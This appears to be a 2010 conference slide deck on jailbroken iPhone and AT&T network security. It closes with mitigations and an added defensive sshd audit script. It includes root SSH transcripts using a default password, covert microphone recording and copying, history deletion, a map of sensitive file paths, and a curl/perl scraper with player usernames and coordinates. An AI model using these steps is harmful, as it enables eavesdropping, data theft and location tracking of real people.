The New World of Smartphone Security
What Your iPhone Disclosed About You
Trevor Hawthorn, Managing Partner
Friday, July 9, 2010
Today’s Talk
“Pockets full of shells”
“I can see you from my house”
Who I am now
Old Smartphone Best Practices
= Bad
= Good
New Smartphone Best Practices
1. IT will use the iPhone Configuration Utility so you can talk to Exchange, use the VPN, wireless, etc.
2. Get iFart, it’s hilarious.
If AT&T is in attendance:
• Facts about AT&T and me:
• I enjoy my AT&T wireless service
• Feel that I have fantastic coverage everywhere I go at all times
• Am sure you have the largest/fastest 3G network, regardless of what VZW says
• Looking forward to years of receiving quality service from you
• Would love to chat
Jailbreaking
blackra1n
pwnagetool
It opens up a whole new world of applications
• common Unix binaries
• sshd
• tethering
• pirate software
• super easy to JB your phone
Impact on security
“Jail breaking removes 80% of the iPhone’s security precautions”
Charlie Miller, SyScan 2009
How many iPhones are jailbroken?
6.93%
[1] http://www.slideshare.net/pinchmedia/piracy-on-the-appstore
Global Stats
ifconfig
```
root# ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
	inet 127.0.0.1 netmask 0xff000000
en0: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500
	ether 00:21:e9:09:e3:4f
pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
	inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
pdp_ip2: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024
pdp_ip3: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024
en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255
	ether 0a:0b:ad:0b:ab:e0
```
Interfaces
en0 = 802.11 interface
pdp_ip0 = primary cellular interface on APN: wap.cingular
pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail
pdp_ip2 = not sure
pdp_ip3 = used with tethering
ifconfig
```
pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
	inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
```
sshd
So what?
Until (about) October 16, 2009, AT&T did not filter device-to-device IP network traffic.
AT&T’s Network
Most people think it looks like this:
/32
Actually, more like this:
Multiple /16’s
Your smartphone (and laptop/blackberry, etc.) has been on one giant flat network...
So I started looking around...
Devices On the Network
10,589* IPs scanned
Count Port What?
83244
3,644
22 sshd
80 http
2008 PDANet
62078 iPhone Default
Other stuff out there
• Saw a Linux box with sshd
• Windows Mobile devices
• Blackberries
• Windows PC’s
• PDANet for the iPhone is an open proxy.
ssh access between phones
```
Trevors-iPhone:~ root# ssh [email protected]
Password: [alpine]
Nates-iPhone:~ root#
Nates-iPhone:~ root# id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),20(staff),29(certusers),80(admin)
```
Filesystem Guide
Interesting stuff:
/private/var/mobile/Library/Mail - Email (IMAP, Exchange, POP3, etc.)
/private/var/mobile/Library/SMS - SMS Text Messages
/private/var/mobile/Library/Voicemail - Voicemail in .amr format
/private/var/mobile/Library/AddressBook - Contacts
/private/var/mobile/Library/CallHistory - Call History
/private/var/mobile/Library/Notes - Notes
/private/var/mobile/Library/CallHistory/call_history.db
/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
/private/var/mobile/Library/AddressBook/AddressbookImages.sqlitedb
/private/var/mobile/Library/Cookies/Cookies.plist
/private/var/mobile/Library/Keyboard/dynamic-text.dat
/private/var/mobile/Library/Mail/Accounts.plist
/private/var/mobile/Library/Mail/(mail account name)/Deleted Messages
/private/var/mobile/Library/Mail/(mail account name)/Sent Messages
/private/var/mobile/Library/Mail/(mail account name)/INBOX
/private/var/mobile/Library/Maps/History.plist
/private/var/mobile/Library/YouTube/Bookmarks.plist
/private/var/mobile/Library/Voicemail/(amr files)
/private/var/mobile/Library/Voicemail/voicemail.db
/private/var/mobile/Library/Safari/Bookmarks.plist
/private/var/mobile/Library/Safari/History.plist
/private/var/mobile/Library/Suspend.plist
/private/var/mobile/Library/Safari/SuspendState.plist
/private/var/mobile/Library/Safari/SMS/sms.db
/private/var/mobile/Library/Preference/(various preference Plists)
/private/var/mobile/Library/Notes/notes.db
Let’s do a bit more
Erica Utilities - cmd line utilities for the iPhone
recAudio: Record audio from the onboard microphone.
findme: Queries the iPhone’s GPS API to return latitude/longitude
[Diagram: Attacker 10.69.62.100, Victim 10.69.62.220; labels: recAudio, scp/ssh, recording.aiff]
I can hear you typing
```
Trevors-iPhone:~ root# scp bin/recAudio [email protected]:
Password:
recAudio 100% 19KB 1.3KB/s 00:00
Trevors-iPhone:~ root# ssh [email protected]
Password:
Nates-iPhone:~ root# ./recAudio
Start talking. Press ^C to finish.
Starting recording
^C
Interrupted.
Stopping recording
```
```
Nates-iPhone:~ root# ls -l *.aiff
-rw-r--r-- 1 root wheel 43178 Oct 2 22:35 2009-10-92\ at\ 22:35:04.aiff
Nates-iPhone:~ root# mv 2009-10-92\ at\ 22:35:04.aiff test.aiff
Trevors-iPhone: root# scp [email protected]:~/*.aiff .
Password:
test.aiff 100% 523KB 2.2KB/s 00:00
Nates-iPhone:~ root# rm test.aiff recAudio .bash_history
Nates-iPhone:~ root# last
wtmp begins at Fri Oct 2 22:41
Nates-iPhone:~ root#
```
Other bad things
• ./openURL tel://1-900-XXX-XXX
• ./openURL tel://911 or tel://mynumber
• Pillage filesystem: email, sms, notes, app data, etc.
• apt-get install tcpdump nmap
• go wild on whatever network en0 is connected to.
Worms and Exploits
Dutch Extortion
November 2009
ikee Worm
November 2009
Exploits
• Phone/Privacy.A* command line tool
• Phone/iBotNet.A* worm with C&C
*Discovered by security firm Intego
Some good news
• AT&T does segment part of their network:
• e.g. I could not see friend in CA from DC
• But I could see friend in Boston
• No easy way to target specific individual (Identity to AT&T NAT IP address not super easy)
• No way to correlate 10.x.x.x IP to person via Safari
• decloak.net doesn’t really work in Mobile Safari
• Man this is slow...
email to ID user
<img src="http://10.69.62.220/i.jpg">
[Diagram: 10.69.63.220:80 and 10.69.63.110; src: 10.69.63.110, dst: 10.69.63.220]
What to do
• Don’t Jailbreak your phone if you care about security (sorry)
• Change root and mobile users’ passwords
• Attention Cydia Folks: Do not bind sshd to pdp interfaces; force password change upon install
• IT Folks: Policy on jailbroken iPhones
• AT&T: Filter mobile to mobile IP traffic
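The recommendation to keep sshd off the pdp interfaces can be checked from a device's own `ifconfig` output and `sshd_config`. The following is an added example, not part of the original slides: the sample inputs are constructed, the function names are hypothetical, and treating an absent `PermitRootLogin` or `PasswordAuthentication` as `yes` is an assumption about the installed sshd build.

```python
import re

# Constructed sample in the BSD ifconfig layout shown on the slides.
SAMPLE_IFCONFIG = (
    "lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384\n"
    "\tinet 127.0.0.1 netmask 0xff000000\n"
    "en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500\n"
    "\tinet 192.168.1.23 netmask 0xffffff00 broadcast 192.168.1.255\n"
    "pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450\n"
    "\tinet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff\n"
    "pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450\n"
)

# Constructed sshd_config texts: one with nothing set, one restricted.
STOCK_CONFIG = "Port 22\n#ListenAddress 0.0.0.0\n#PermitRootLogin yes\n"
RESTRICTED_CONFIG = (
    "# reachable only through a local tunnel\n"
    "ListenAddress 127.0.0.1\n"
    "PermitRootLogin no\n"
    "PasswordAuthentication no\n"
)

# Conservative: "::" is treated as covering IPv4 too (dual-stack sockets).
WILDCARDS = {"0.0.0.0", "::"}


def parse_ifconfig(text):
    """Return {interface: [IPv4 addresses]} from BSD-style ifconfig output."""
    ifaces, current = {}, None
    for line in text.splitlines():
        head = re.match(r"(\S+): flags=", line)
        if head:
            current = head.group(1)
            ifaces[current] = []
            continue
        inet = re.match(r"\s+inet (\d{1,3}(?:\.\d{1,3}){3})\b", line)
        if inet and current is not None:
            ifaces[current].append(inet.group(1))
    return ifaces


def directives(sshd_config):
    """Yield (keyword, value) pairs, skipping comments and blank lines."""
    for raw in sshd_config.splitlines():
        fields = raw.split("#", 1)[0].split(None, 1)
        if len(fields) == 2:
            yield fields[0].lower(), fields[1].strip()


def option(sshd_config, keyword, default):
    """sshd keeps the first value it reads for a keyword; else use default."""
    for key, value in directives(sshd_config):
        if key == keyword.lower():
            return value.lower()
    return default


def listen_hosts(sshd_config):
    """Hosts named by ListenAddress lines; an empty list means 'all addresses'."""
    hosts = []
    for key, value in directives(sshd_config):
        if key != "listenaddress":
            continue
        host = value.split()[0]
        if host.startswith("["):        # [host]:port form
            host = host[1:].split("]", 1)[0]
        elif host.count(":") == 1:      # IPv4-or-name:port form
            host = host.split(":", 1)[0]
        hosts.append(host)
    return hosts


def exposed_cellular(ifconfig_text, sshd_config):
    """(interface, address) pairs on pdp_ip* interfaces that sshd would bind."""
    hosts = listen_hosts(sshd_config)
    binds_all = not hosts or any(h in WILDCARDS for h in hosts)
    return sorted(
        (name, addr)
        for name, addrs in parse_ifconfig(ifconfig_text).items()
        if name.startswith("pdp_ip")
        for addr in addrs
        if binds_all or addr in hosts
    )


def audit(ifconfig_text, sshd_config):
    """Return human-readable findings for the two 'What to do' items."""
    findings = [
        f"sshd reachable on cellular interface {name} ({addr})"
        for name, addr in exposed_cellular(ifconfig_text, sshd_config)
    ]
    # Assumption: both keywords fall back to "yes" when not set.
    root = option(sshd_config, "PermitRootLogin", "yes")
    password = option(sshd_config, "PasswordAuthentication", "yes")
    if root == "yes" and password == "yes":
        findings.append("root can log in with a password")
    return findings


if __name__ == "__main__":
    for label, cfg in (("stock", STOCK_CONFIG), ("restricted", RESTRICTED_CONFIG)):
        print(label, audit(SAMPLE_IFCONFIG, cfg) or "no findings")
```

A config with no `ListenAddress` line is reported as exposed on every pdp interface that holds an address, which is the situation the slides describe.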
Privacy and Location Based Apps
Location Based Apps
• Underworld: Sweet Deal
• Drug trafficking game with candy
• Location matters, move product from point A to point B
• Phone sends high resolution coordinates to game server
Like Druglords
Underworld: Sweetdeal
Google Maps
Paros
• Client side proxy
• Configure the iPhone to use the IP address of the machine running Paros as its proxy
• Watch what your apps send and receive
Request
Response
Used to monitor players
Let’s pick a non-intel agency player
chezk
Request
Response
Lat/Lon to GMaps:
County Records
Ok neat, what else?
Near real-time geolocation tracking of players
cURL + perl + crontab = csv + gpsbabel = kml + Google Earth = EPIC screen shots
curl script
```sh
#!/bin/sh
#
# First login...
#
curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -d @/home/trevor/iphone/login.xml --dump-header /home/trevor/iphone/headers.txt http://game.dl.a-steroids.com/TrafficServer/
#
# Then update location
curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/update_loc.xml http://game.dl.a-steroids.com/TrafficServer/
#
# Get GMap objects
curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/gmap_update.xml http://game.dl.a-steroids.com/TrafficServer/
```
perl script
```perl
#! /usr/bin/perl
use strict;
use warnings;

# make single or multiline input into one scalar
my $glob = join('', (<>));

# extract name-to-flag records (/s lets "." cross line breaks in multiline input)
my @records = $glob =~ /(<name>.*?<\/lon>)/igs;

for (@records) {
    my ($name, $lat, $lon) = $_ =~ qr|<name>(.*?)</name>.*?<lat>([\-\d\.]*)</lat><lon>([\-\d\.]*)</lon>|is;
    print "$lat,$lon,$name\n";
}
```
perl script output
```
39.93220206723633,-77.47186584472656,poppyseed
38.13753356933594,-77.06847380591797,Gadsden
39.98429718017578,-78.30014190673828,Ziggety
39.23520812988281,-77.40483581542969,Lexi
39.855418395996094,-77.2717056274414,Tatu
39.55705801582031,-77.4004086303711,Bigfoot
36.67790985107422,-77.5902328491211,Jeneko
38.297552490234375,-77.65829467773438,Stilbored
39.891050720214844,-77.55879211025781,Timoteo
39.66313247680664,-78.04374694824219,Gamber
36.295310314697266,-78.14061126700984,UnderWear
```
Comments/Feedback:
www.stratumsecurity.com
Twitter:
@packetwerks
@stratumsecurity
Special Thanks: Tiago Stock